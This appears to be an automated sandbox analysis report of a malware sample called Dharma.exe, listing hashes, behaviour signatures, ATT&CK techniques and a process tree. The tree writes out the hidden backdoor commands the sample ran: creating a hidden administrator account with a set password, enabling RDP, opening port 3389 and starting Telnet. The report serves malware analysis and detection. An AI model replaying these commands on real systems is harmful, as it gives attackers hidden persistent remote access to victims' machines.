Analysis
-
max time kernel
96s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 01:32
Static task
static1
Behavioral task
behavioral1
Sample
Dharma.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Dharma.exe
Resource
win10v2004-20241007-en
General
-
Target
Dharma.exe
-
Size
11.5MB
-
MD5
928e37519022745490d1af1ce6f336f7
-
SHA1
b7840242393013f2c4c136ac7407e332be075702
-
SHA256
6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
-
SHA512
8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
-
SSDEEP
196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 628 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Sets service image path in registry 2 TTPs 6 IoCs
Processes:
mssql.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssqlaq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\hitqrqgatgqyowu\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\hitqrqgatgqyowu.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dxonmrlnggtmlep\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\dxonmrlnggtmlep.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\smbkikjttfviant\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\smbkikjttfviant.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ehipdtwnkxgjvqao\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\ehipdtwnkxgjvqao.sys" mssql.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Dharma.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Dharma.exe -
Executes dropped EXE 4 IoCs
Processes:
nc123.exemssql.exemssql2.exeSearchHost.exepid Process 3708 nc123.exe 2344 mssql.exe 1396 mssql2.exe 4936 SearchHost.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 8 IoCs
Processes:
mssql.exedescription ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\EHIPDTWNKXGJVQAO.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitqrqgatgqyowu.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\HITQRQGATGQYOWU.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dxonmrlnggtmlep.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DXONMRLNGGTMLEP.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\smbkikjttfviant.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SMBKIKJTTFVIANT.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ehipdtwnkxgjvqao.sys mssql.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
SearchHost.exedescription ioc Process File opened (read-only) \??\D: SearchHost.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" reg.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 1060 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net.exenet1.exenc123.execmd.exenet1.exemssql2.execmd.exeWMIC.exenet.exenet1.execmd.exereg.exeDharma.execmd.exenet1.exenet1.execmd.exenet.exesc.exeSearchHost.exefind.exenet.exeWMIC.exereg.exereg.exefind.exeattrib.exenetsh.exenet.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nc123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mssql2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dharma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SearchHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
Runs net.exe
-
Suspicious behavior: LoadsDriver 32 IoCs
Processes:
mssql.exepid Process 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe 2344 mssql.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
mssql.exemssql2.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeLoadDriverPrivilege 2344 mssql.exe Token: SeDebugPrivilege 1396 mssql2.exe Token: SeIncreaseQuotaPrivilege 3060 WMIC.exe Token: SeSecurityPrivilege 3060 WMIC.exe Token: SeTakeOwnershipPrivilege 3060 WMIC.exe Token: SeLoadDriverPrivilege 3060 WMIC.exe Token: SeSystemProfilePrivilege 3060 WMIC.exe Token: SeSystemtimePrivilege 3060 WMIC.exe Token: SeProfSingleProcessPrivilege 3060 WMIC.exe Token: SeIncBasePriorityPrivilege 3060 WMIC.exe Token: SeCreatePagefilePrivilege 3060 WMIC.exe Token: SeBackupPrivilege 3060 WMIC.exe Token: SeRestorePrivilege 3060 WMIC.exe Token: SeShutdownPrivilege 3060 WMIC.exe Token: SeDebugPrivilege 3060 WMIC.exe Token: SeSystemEnvironmentPrivilege 3060 WMIC.exe Token: SeRemoteShutdownPrivilege 3060 WMIC.exe Token: SeUndockPrivilege 3060 WMIC.exe Token: SeManageVolumePrivilege 3060 WMIC.exe Token: 33 3060 WMIC.exe Token: 34 3060 WMIC.exe Token: 35 3060 WMIC.exe Token: 36 3060 WMIC.exe Token: SeIncreaseQuotaPrivilege 3060 WMIC.exe Token: SeSecurityPrivilege 3060 WMIC.exe Token: SeTakeOwnershipPrivilege 3060 WMIC.exe Token: SeLoadDriverPrivilege 3060 WMIC.exe Token: SeSystemProfilePrivilege 3060 WMIC.exe Token: SeSystemtimePrivilege 3060 WMIC.exe Token: SeProfSingleProcessPrivilege 3060 WMIC.exe Token: SeIncBasePriorityPrivilege 3060 WMIC.exe Token: SeCreatePagefilePrivilege 3060 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SearchHost.exepid Process 4936 SearchHost.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
SearchHost.exepid Process 4936 SearchHost.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
mssql.exemssql2.exeSearchHost.exepid Process 2344 mssql.exe 2344 mssql.exe 1396 mssql2.exe 1396 mssql2.exe 4936 SearchHost.exe 2344 mssql.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dharma.execmd.execmd.exenet.exenet.execmd.exenet.exenc123.exenet.exedescription pid Process procid_target PID 3012 wrote to memory of 3708 3012 Dharma.exe 82 PID 3012 wrote to memory of 3708 3012 Dharma.exe 82 PID 3012 wrote to memory of 3708 3012 Dharma.exe 82 PID 3012 wrote to memory of 2344 3012 Dharma.exe 85 PID 3012 wrote to memory of 2344 3012 Dharma.exe 85 PID 3012 wrote to memory of 1396 3012 Dharma.exe 86 PID 3012 wrote to memory of 1396 3012 Dharma.exe 86 PID 3012 wrote to memory of 1396 3012 Dharma.exe 86 PID 3012 wrote to memory of 4208 3012 Dharma.exe 87 PID 3012 wrote to memory of 4208 3012 Dharma.exe 87 PID 3012 wrote to memory of 4208 3012 Dharma.exe 87 PID 3012 wrote to memory of 4248 3012 Dharma.exe 89 PID 3012 wrote to memory of 4248 3012 Dharma.exe 89 PID 3012 wrote to memory of 4248 3012 Dharma.exe 89 PID 3012 wrote to memory of 4936 3012 Dharma.exe 91 PID 3012 wrote to memory of 4936 3012 Dharma.exe 91 PID 3012 wrote to memory of 4936 3012 Dharma.exe 91 PID 4248 wrote to memory of 4492 4248 cmd.exe 93 PID 4248 wrote to memory of 4492 4248 cmd.exe 93 PID 4248 wrote to memory of 4492 4248 cmd.exe 93 PID 4492 wrote to memory of 3060 4492 cmd.exe 94 PID 4492 wrote to memory of 3060 4492 cmd.exe 94 PID 4492 wrote to memory of 3060 4492 cmd.exe 94 PID 4492 wrote to memory of 4640 4492 cmd.exe 95 PID 4492 wrote to memory of 4640 4492 cmd.exe 95 PID 4492 wrote to memory of 4640 4492 cmd.exe 95 PID 4248 wrote to memory of 2784 4248 cmd.exe 97 PID 4248 wrote to memory of 2784 4248 cmd.exe 97 PID 4248 wrote to memory of 2784 4248 cmd.exe 97 PID 2784 wrote to memory of 3688 2784 net.exe 98 PID 2784 wrote to memory of 3688 2784 net.exe 98 PID 2784 wrote to memory of 3688 2784 net.exe 98 PID 4248 wrote to memory of 1332 4248 cmd.exe 101 PID 4248 wrote to memory of 1332 4248 cmd.exe 101 PID 4248 wrote to memory of 1332 4248 cmd.exe 101 PID 1332 wrote to memory of 4384 1332 net.exe 102 PID 1332 wrote to memory of 4384 1332 net.exe 102 PID 1332 wrote to memory of 4384 1332 net.exe 102 PID 4248 wrote to memory of 1852 4248 cmd.exe 103 PID 4248 wrote to memory of 1852 4248 cmd.exe 103 PID 4248 wrote to memory of 1852 4248 cmd.exe 103 PID 1852 wrote to memory of 3584 1852 cmd.exe 104 PID 1852 wrote to memory of 3584 1852 cmd.exe 104 PID 1852 wrote to memory of 3584 1852 cmd.exe 104 PID 1852 wrote to memory of 3560 1852 cmd.exe 105 PID 1852 wrote to memory of 3560 1852 cmd.exe 105 PID 1852 wrote to memory of 3560 1852 cmd.exe 105 PID 4248 wrote to memory of 2212 4248 cmd.exe 106 PID 4248 wrote to memory of 2212 4248 cmd.exe 106 PID 4248 wrote to memory of 2212 4248 cmd.exe 106 PID 2212 wrote to memory of 2680 2212 net.exe 107 PID 2212 wrote to memory of 2680 2212 net.exe 107 PID 2212 wrote to memory of 2680 2212 net.exe 107 PID 3708 wrote to memory of 4992 3708 nc123.exe 108 PID 3708 wrote to memory of 4992 3708 nc123.exe 108 PID 3708 wrote to memory of 4992 3708 nc123.exe 108 PID 4248 wrote to memory of 4084 4248 cmd.exe 109 PID 4248 wrote to memory of 4084 4248 cmd.exe 109 PID 4248 wrote to memory of 4084 4248 cmd.exe 109 PID 4084 wrote to memory of 4552 4084 net.exe 110 PID 4084 wrote to memory of 4552 4084 net.exe 110 PID 4084 wrote to memory of 4552 4084 net.exe 110 PID 4248 wrote to memory of 3636 4248 cmd.exe 111 PID 4248 wrote to memory of 3636 4248 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dharma.exe"C:\Users\Admin\AppData\Local\Temp\Dharma.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵
- System Location Discovery: System Language Discovery
PID:4992
-
-
-
C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"2⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat" "2⤵
- System Location Discovery: System Language Discovery
PID:4208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
-
C:\Windows\SysWOW64\net.exenet user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators systembackup /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators systembackup /add4⤵
- System Location Discovery: System Language Discovery
PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value4⤵
- System Location Discovery: System Language Discovery
PID:3584
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
- System Location Discovery: System Language Discovery
PID:3560
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" systembackup /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:2680
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited4⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f3⤵
- System Location Discovery: System Language Discovery
PID:3636
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f3⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\systembackup +r +a +s +h3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2672
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 "Remote Desktop"3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start=auto3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1060
-
-
C:\Windows\SysWOW64\net.exenet start Telnet3⤵
- System Location Discovery: System Language Discovery
PID:3392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Telnet4⤵
- System Location Discovery: System Language Discovery
PID:4316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe"C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4936
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
2Disable or Modify System Firewall
1Safe Mode Boot
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD55531bbb8be242dfc9950f2c2c8aa0058
SHA1b08aadba390b98055c947dce8821e9e00b7d01ee
SHA2564f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7
SHA5123ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291
-
Filesize
1.6MB
MD58add121fa398ebf83e8b5db8f17b45e0
SHA1c8107e5c5e20349a39d32f424668139a36e6cfd0
SHA25635c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413
SHA5128f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273
-
Filesize
28B
MD5df8394082a4e5b362bdcb17390f6676d
SHA15750248ff490ceec03d17ee9811ac70176f46614
SHA256da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878
SHA5128ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d
-
Filesize
674KB
MD5b2233d1efb0b7a897ea477a66cd08227
SHA1835a198a11c9d106fc6aabe26b9b3e59f6ec68fd
SHA2565fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da
SHA5126ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37
-
Filesize
10.2MB
MD5f6a3d38aa0ae08c3294d6ed26266693f
SHA19ced15d08ffddb01db3912d8af14fb6cc91773f2
SHA256c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad
SHA512814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515
-
Filesize
6.7MB
MD5f7d94750703f0c1ddd1edd36f6d0371d
SHA1cc9b95e5952e1c870f7be55d3c77020e56c34b57
SHA256659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d
SHA512af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa
-
Filesize
125KB
MD5597de376b1f80c06d501415dd973dcec
SHA1629c9649ced38fd815124221b80c9d9c59a85e74
SHA256f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446
SHA512072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b
-
Filesize
1KB
MD5b4b2f1a6c7a905781be7d877487fc665
SHA17ee27672d89940e96bcb7616560a4bef8d8af76c
SHA2566246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f
SHA512f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6